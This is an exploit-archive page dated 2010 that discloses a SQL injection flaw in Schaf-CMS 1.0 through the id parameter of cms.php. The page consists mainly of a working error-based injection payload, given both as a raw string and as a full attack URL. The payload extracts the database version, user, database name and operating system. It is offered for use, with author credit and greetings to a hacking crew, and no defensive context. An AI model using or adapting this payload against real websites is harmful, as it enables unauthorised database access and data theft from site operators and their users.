Schaf-CMS 1.0 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Schaf-CMS 1.0 SQL Injection Vulnerability
# Published : 2010-05-24
# Author : Manas58
# Previous Title : PHP Graphy <== 0.9.7 (index.php) Remote Command Execution Vulnerability
# Next Title : Apache Axis2(1.4.1) Local File Inclusion Vulnerability

Schaf-CMS 1.0 SQL Injection  Vulnerability   
      
###########################  
      
Author    : Manas58   
Homepage  : http://www.1923turk.com      
Script    : Schaf-CMS 1.0  
Download  : http://www.brothersoft.com/site-builder-software---cms-53489.html 
      
###########################    
        
[ Vulnerable File ]  
    
cms.php?id= [ SQL ]  
         
    
[ XpL ]  
      
+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+
    
    
http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+      
  
 
  
       
##############################################################    
# Greetz: Gamoscu - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO    
##############################################################